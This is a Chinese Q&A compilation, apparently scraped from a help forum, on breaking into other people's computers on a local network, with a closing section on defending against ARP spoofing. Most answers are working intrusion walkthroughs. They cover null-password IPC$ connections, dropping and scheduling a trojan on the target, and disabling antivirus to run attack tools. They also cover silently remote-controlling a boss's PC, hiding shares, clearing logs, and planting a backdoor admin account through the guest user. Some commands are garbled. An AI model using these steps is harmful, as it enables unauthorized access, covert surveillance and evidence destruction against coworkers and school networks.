局域网入侵局域网入侵

哪位电脑高人帮忙，有关局域网入侵的……急！！

IPC入侵在命令提示符下 1 建立IPC连接 use \ipipc$ "" /user:"administrator" 2 映身磁盘 use z: \ipc$ 3 把你要上传的木马传到你电脑上的Z盘上（也就是对方的C盘） 4 用time \ip 查对方的系统时间 得到对方系统时钟。

5 at 命令执行你上传的那个家伙格式如 at \ip 执行时间 执行的文件 这些只是简单的几步如果想交流交流加我QQ：461000582 要对方看啥系统 如WIN98开始运行输入 \IP共享盘符concon对方就死机了例对方IP192.168.1.1 c盘共享 你就输入\192.168.1.1cconcon 如果你和对方是win2000的话 开始运行输入CMD 接着输 user \192.168.1.1ipc$ "" /user:"administrator" 如果提示命令成功的话 你就copy 木马.exe 192.168.1.1C$ 然后at 木马.exe 时间

跪求局域网内入侵别人电脑的方法（不能用木马）高手请进！悬殊100分，重谢！

你这个必须用灰鸽子收费版木马控制，用优盘传入组长电脑或者在你公司网址漏洞注入花生壳包含木马，当你组长点击中木马不会被杀掉的，然后映射D硬盘服务器可以远程把电脑当代理服务器，让电脑显示器关闭状态，是不用开启的，你只需要打开主机事情搞定！！！你们局域网服务器不关的就行！ 100分拿来！专业指导慎重使用

求问局域网电脑入侵的问题

先申明： 　　1.入侵的范围只包括局域网，如果在学校上，可以入侵整个校园网; 　　2.能入侵的只是存在弱口令(用户名为administrator等,密码为空)，并且开了***端口，但没开防火墙的机子。

　　入侵工具： 　　一般要用到三个：NTscan**扫描器，Recton--D贺免杀专用版，DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒，建议将杀毒软件实时防毒暂时关掉，并将这两个软件的压缩包加密，防止被杀。

) 　　入侵步骤： 　　1.使用"NTscan**扫描器"，在IP处填上要扫描的IP范围，选择"WMI扫描"方式，按"开始"后就等扫描结果了。

　　2.使用"Recton--D贺免杀专用版" 　　选择"CMD命令"项，在"CMD:"中输入 share C$=C:"，即可开启远程主机的C盘共享，以此将"C"换成D,E,F等，即可开启D盘，E盘，F盘等的共享，这种共享方式隐蔽性很高，而且是完全共享，在对方主机上不会出现一只手托住盘的共享标志，然后在地址栏中输入"\对方IPC$"，即可进入对方C盘。

　　选择""项，在"远程主机"中输入刚才扫描到的一个IP，远程启动服务，成功后在"CMD选项"中，执行命令： share ipc$",接着执行： share admin$",最后执行 use \***.***.***.***IPC$" /user：administrator"在*处填入你入侵的主机IP。

　　3.使用"DameWare迷你中文版 4.5"，安装后点"DameWare Mini Remote Control"，在"帮助"项中选择激活产品，输入注册信息，成功注册后，进入"远程连接"窗口，在"主机"处填入IP地址，点"设置"，在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选，在"用户选项"中去掉"启用用户选项菜单"。

设置完成好后，就可点"连接"，在弹出的对话框中点"确定"后，成功后你就可以像操作自己机子一样控制别人电脑了，当然你也可以只选择监视对方屏幕。

注意：如果不注册的话，在对方主机上会弹出一个对话框，暴露你的身份。

　　入侵步骤补充： 　　1.在以上第2步中，远程启动服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将改为手动-启动"完成。

　　2.Recton-D贺免杀专用版还有其他功能，在"进程"项中，可以查看远程主机的进程，并可任意结束其中进程;在"共享"项中，可以创建共享，我常用的是创建C$,D$,E$,F$,共享路径分别对应C：,D：等，共享好后在地址栏中输入\IPC$,进入对方C盘，你就可以随意复制删除里面的东西了，而且这种共享对方机子盘符上不会显示共享图标，也就不会被发现，弄完后最好还是把共享给关掉。

最后选"日志"，清除所有日志，不留痕迹。

这个软件会被杀毒软件当作病毒杀掉，用它时须将实时防毒关掉。

　　3.上面的共享可通过CMD(程序-附件-命令提示符)完成，首先" IP",上去,键入y后输入的用户名"administrator",密码为空, 进入后，开共享 share命令，共享C$(即C盘)： share C$=C：",共享system文件夹： share c=c：winntsystem32",共享IPC$用： share IPC$"等,最后是关闭共享，关闭C盘共享： share C$ /del"。

　　4.为方便下次入侵，可以设置后门， 查看用户： user",激活guest用户 　　 user guest /active：yes",更改guest的密码为poco： user guest poco",把guest的权限提升为管理员权限： localgroup administrators guest /add"。

　　命令(DOS命令)很多，可去网上查找它的命令，常用的有：查看D盘文件：""dir d：",查看C盘program file文件夹："dir c：PROGRA~1;",60秒倒记时关机："shutdown -s -t 60" 　　补充说明： 　　 use错误原因解决： 　　(1)."发生系统错误 ***6。

登录失败： 未知的用户名或错误密码。

" 　　在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。

简单文件共享会把网络连接权限都归为 guest连接，是无法访问C$等管理共享的. 　　(2)"发生系统错误 ***7。

登陆失败：用户帐户**。

可能的原因包括不允许空密码，登陆时间**，或强制的策略限。

"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里，禁用"空密码用户只能进行控制台登陆". 　　(3)"//IP/c$"时提示找不到网络途径。

在"网络和拨号连接"中"本地连接"中选取"协议(TCP/IP)"属性，进入"高级TCP/IP设置"选"WINS设置"里面有一项"启用TCP/IP的NETBIOS".

局域网入侵

我们可以采取以下措施防范ARP欺骗。

（1）在客户端使用arp命令绑定网关的真实MAC地址命令如下： arp -d *(先清除错误的ARP表) arp -s 192.168.1.1 03-03-03-03-03-03 （静态指定网关的MAC地址） （2）在交换机上做端口与MAC地址的静态绑定。

（3）在路由器上做IP地址与MAC地址的静态绑定。

（4）使用“ARP SERVER”按一定的时间间隔广播网段内所有主机的正确IP-MAC映射表。

（5）最主要是要提高用户的安全意识，养成良好的安全习惯，包括：及时安装系统补丁程序；为系统设置强壮的密码；安装防火墙；安装有效的杀毒软件并及时升级病毒库；不主动进行网络攻击，不随便运行不受信任的软件。

局域网内一旦有ARP的攻击存在，会欺骗局域网内所有主机和网关，让所有上网的流量必须经过ARP攻击者控制的主机。

其他用户原来直接通过网关上网，现在却转由通过被控主机转发上网。

由于被控主机性能和程序性能的影响，这种转发并不会非常流畅，因此就会导致用户上网的速度变慢甚至频繁断线。

另外ARP欺骗需要不停地发送ARP应答包，会造成网络拥塞。

一旦怀疑有ARP攻击我们就可以使用抓包工具来抓包，如果发现网内存在大量ARP应答包，并且将所有的IP地址都指向同一个MAC地址，那么就说明存在ARP欺骗攻击，并且这个MAC地址就是用来进行ARP欺骗攻击的主机MAC地址，我们可以查出它对应的真实IP地址，从而采取相应的控制措施。

另外，我们也可以到路由器或者网关交换机上查看IP地址与MAC地址的对应表，如果发现某一个MAC对应了大量的IP地址，那么也说明存在ARP欺骗攻击，同时通过这个MAC地址查出用来ARP欺骗攻击的主机在交换机上所对应的物理端口，从而进行控制。